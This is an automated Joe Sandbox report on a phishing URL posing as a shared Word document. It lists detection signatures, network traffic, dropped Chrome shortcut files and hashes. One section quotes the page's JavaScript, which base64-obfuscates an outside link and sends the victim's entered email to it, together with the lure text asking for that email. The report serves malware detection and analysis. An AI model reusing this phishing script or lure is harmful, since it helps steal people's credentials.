Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://jonotarmot.com/dcs/ms_doc.html

Overview

General Information

Sample URL:	http://jonotarmot.com/dcs/ms_doc.html
Analysis ID:	1577845
Infos:

Detection

HTMLPhisher

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish10

HTML body contains low number of good links

HTML title does not match URL

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64

chrome.exe (PID: 1852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2008,i,1113165676630254317,7263189473961019682,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://jonotarmot.com/dcs/ms_doc.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://jonotarmot.com/dcs/ms_doc.html

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Yara detected HtmlPhish10

Source: Yara match

File source: 1.0.pages.csv, type: HTML

Source: http://jonotarmot.com/dcs/ms_doc.html

HTTP Parser: Number of links: 0

Source: http://jonotarmot.com/dcs/ms_doc.html

HTTP Parser: Title: ****---*** does not match URL

Source: http://jonotarmot.com/dcs/ms_doc.html

HTTP Parser: Has password / email / username input fields

Source: http://jonotarmot.com/dcs/ms_doc.html

HTTP Parser: No favicon

Source: http://jonotarmot.com/dcs/ms_doc.html

HTTP Parser: No <meta name="author".. found

Source: http://jonotarmot.com/dcs/ms_doc.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?username=57t7o2@ydtohcj.io HTTP/1.1Host: 0nline1.most-secure.inkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://jonotarmot.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dcs/ms_doc.html HTTP/1.1Host: jonotarmot.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jonotarmot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://jonotarmot.com/dcs/ms_doc.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jonotarmot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: jonotarmot.com
Source: global traffic	DNS traffic detected: DNS query: 0nline1.most-secure.ink

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: classification engine

Classification label: mal56.phis.win@17/10@8/5

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2008,i,1113165676630254317,7263189473961019682,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://jonotarmot.com/dcs/ms_doc.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2008,i,1113165676630254317,7263189473961019682,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://jonotarmot.com/dcs/ms_doc.html	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
http://jonotarmot.com/dcs/ms_doc.html	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://jonotarmot.com/favicon.ico	0%	Avira URL Cloud	safe
https://0nline1.most-secure.ink/?username=57t7o2@ydtohcj.io	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	172.217.19.228	true	false		high
0nline1.most-secure.ink	134.209.237.210	true	false		unknown
jonotarmot.com	198.54.120.20	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://jonotarmot.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://0nline1.most-secure.ink/?username=57t7o2@ydtohcj.io	false	Avira URL Cloud: safe	unknown
http://jonotarmot.com/dcs/ms_doc.html	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.19.228	www.google.com	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
198.54.120.20	jonotarmot.com	United States		22612	NAMECHEAP-NETUS	false
134.209.237.210	0nline1.most-secure.ink	United States		14061	DIGITALOCEAN-ASNUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577845
Start date and time:	2024-12-18 20:20:36 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://jonotarmot.com/dcs/ms_doc.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.phis.win@17/10@8/5

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.17.78, 64.233.164.84, 172.217.17.46, 142.250.181.142, 172.217.17.42, 172.217.19.202, 172.217.17.74, 142.250.181.74, 172.217.19.234, 142.250.181.106, 172.217.19.10, 142.250.181.138, 217.20.57.26, 192.229.221.95, 172.217.17.35, 23.218.208.109, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://jonotarmot.com/dcs/ms_doc.html

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: http://jonotarmot.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: http://jonotarmot.com
URL: http://jonotarmot.com/dcs/ms_doc.html... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script has a moderate risk level due to the following factors: - It uses the `window.location.href` property to redirect the user to a dynamically constructed URL, which could potentially lead to a malicious redirect (2 points). - The script decodes a base64-encoded string to construct the final URL, which could be used to obfuscate the destination (2 points). - However, the script also includes a basic email validation function, which suggests a legitimate purpose. Additionally, the script does not exhibit any high-risk behaviors like dynamic code execution or data exfiltration." }
document.getElementById('continue-button').addEventListener('click', function() { continueLoading(); }); document.getElementById('thesupwillsup-input').addEventListener('keydown', function(event) { if (event.key === 'Enter') { continueLoading(); } }); function continueLoading() { var thesupwillsup = document.getElementById('thesupwillsup-input').value; if (validateEmail(thesupwillsup)) { var linkx = "aHR0cHM6Ly8wbmxpbmUxLm1vc3Qtc2VjdXJlLmluay8/dXNlcm5hbWU9"; //PUT YOUR LINK HERE var decodedLink = atob(linkx); var finalLink = decodedLink + "" + thesupwillsup; // appender window.location.href = finalLink; } else { alert("Please enter a valid email address."); } } function validateEmail(email) { var re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/; return re.test(email); }
URL: http://jonotarmot.com/dcs/ms_doc.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "We need verify the intended recipient's email to continue reading in word document. Please enter the email address to which document was shared.", "prominent_button_name": "Open in Word Document", "text_input_field_labels": "517r02@ydtohcj.io", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://jonotarmot.com/dcs/ms_doc.html Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 18:21:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9826791156180583
Encrypted:	false
SSDEEP:	48:8idhjTJ55fHvidAKZdA19ehwiZUklqehay+3:8gb/Zy
MD5:	580A20527397C69295AC231ED5EDC8C0
SHA1:	7AECB5510180A293811E62B3BA430AA110BF5A80
SHA-256:	7384F9435F6FA46AB28FFFFA8CE8B0AF2B586CFF931713D98460085307980719
SHA-512:	1831CF4C46C0B1A432743CC2890D8130C61012E38E4D9D71CA7527627D01FEE54D1DE15B9C6843F39166E5A05E5B17D35FB93E828EB61787FC7F0925112E9857
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....T9..Q..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 18:21:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9988366541288385
Encrypted:	false
SSDEEP:	48:8JdhjTJ55fHvidAKZdA1weh/iZUkAQkqehJy+2:8FbF9QYy
MD5:	56B6626222F681903A874CA55CBFCDFD
SHA1:	71B2F4657817E60C762584580CB1C0453D95BDFB
SHA-256:	2A36FE18735F4E6DA508EDE7B5245BD1B0711FC8B095DA5914E636CA13CCC2F9
SHA-512:	AAB1C4AEFECF1F0347C539B2B6D6C0D030DC91DE9E6FEEC971D6DD18B46386B0C4B6B9A673BC5C63E897D9207D29C6297326C81F5FF533FF64FED2B98F6E5476
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,........Q..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0086615544570465
Encrypted:	false
SSDEEP:	48:8xadhjTJ5sHvidAKZdA14tseh7sFiZUkmgqeh7sfy+BX:8xobqnFy
MD5:	CD9D69D7ADAF4B93E36ACA0BCC4210FE
SHA1:	F56C3752A325FB15151401A11135D3AD6EBE39E5
SHA-256:	1C8D6647FFCC54EABF32C741B0348DD0994EEE4C619CA841FD551E2E20F3A6E4
SHA-512:	98BE0C54EEA18B673A5FF4B76C18F29519455F27C1D332791614B0CB8A41997E263850BD59073F083F3DBCE2E44BBF32D715DC4460115AEFD182652C712C291D
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 18:21:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9986913027627744
Encrypted:	false
SSDEEP:	48:86dhjTJ55fHvidAKZdA1vehDiZUkwqehty+R:8IbGHy
MD5:	9FA4D6C32289C1F6847DB07C5B68CCFE
SHA1:	0B5E11526C9C0F2AB8BCCDB2A50D87CBAF42F62F
SHA-256:	600D9BCF5ACCC7B25C80BA4FBED839591AB09A627D694BD7E52E2B15E8ED4913
SHA-512:	01A959994B05177A91C772E7B58E4210788FE1FEB582AB051BDB5A7B2C2D1EE5247F533B5882EEB4D3AFFE34C5871A8902B5BEC9CD28B4907C8951518B72C959
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......#..Q..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 18:21:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9872612194235533
Encrypted:	false
SSDEEP:	48:8x1dhjTJ55fHvidAKZdA1hehBiZUk1W1qeh7y+C:8/bG9by
MD5:	9474F0EEE5A687AC095CB94F16FFCE29
SHA1:	B583A17193FE0CF0B573FC3BE87A0F0B0ED984F8
SHA-256:	C43674B4B49EA6C771E25B706D43032DDC5E0A9E5EF71C606F8D00196FC8B511
SHA-512:	5788AABD1D2FCAD7BDBDF6C259A8B87035623987485D0F801C3154BC849A450424F2C1889D0E211F3A25EBF69BEE96041F5734F0E2762E4BFC1BD76D87B3DE95
Malicious:	false
Reputation:	low
